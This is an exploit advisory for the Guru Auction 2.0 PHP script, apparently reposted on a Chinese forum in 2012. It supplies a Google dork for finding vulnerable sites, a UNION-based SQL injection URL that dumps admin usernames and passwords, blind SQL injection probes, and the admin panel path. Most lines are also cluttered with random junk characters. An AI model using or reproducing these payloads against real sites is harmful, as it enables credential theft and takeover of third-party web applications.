Guru Auction 2.0 Multiple SQL Injection Vulnerabilities8 ]% t- h. ~4 b9 y* k9 {( T
. @3 k6 O$ d" [作者 : v3n0m* R( b# `( \. e& Q' Z$ @
应用 : Guru Auction 2.0
+ H! S' q3 Y3 R, X5 cPrice : $498 p8 ^8 F* D% Y9 g
Vendor : http://www.guruscript.com/
9 |& B0 a, C) z0 HGoogle Dork : inurl:subcat.php?cate_id=
( j ]# D0 L/ \7 ^6 q. B
% s" s. {0 q' a/ T+ p2 RSQLi p0c:
3 \7 n2 B" b8 ], C! S* h~~~~~~~~~~# n7 s, s4 w5 R- t
http://domain.tld/[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--. T3 C0 i3 \( Q+ b, G; Y2 b6 d
$ |5 t4 z+ J* s
- N" ^- ?) G6 H6 r6 _
盲注 p0c:- |/ _# f* i/ z' m
~~~~~~~~~~
! ^% C" B/ B; }$ `# |) [http://www.political-security.com /[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true4 D* p7 H) H9 U! Y: W3 S
http://domain.tld/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false# u8 t4 g+ {/ R' o
# |6 u" x( O! H8 ^; U
管理登录入口:
& _& R/ i) w* b5 {~~~~~~~~~~
?/ r* T8 h3 s3 ]3 d: _% lhttp://domain.tld/[path]/admin/, a/ q4 {3 ~/ u8 x
|
发表于 2012-12-31 09:24:05
收藏
支持
反对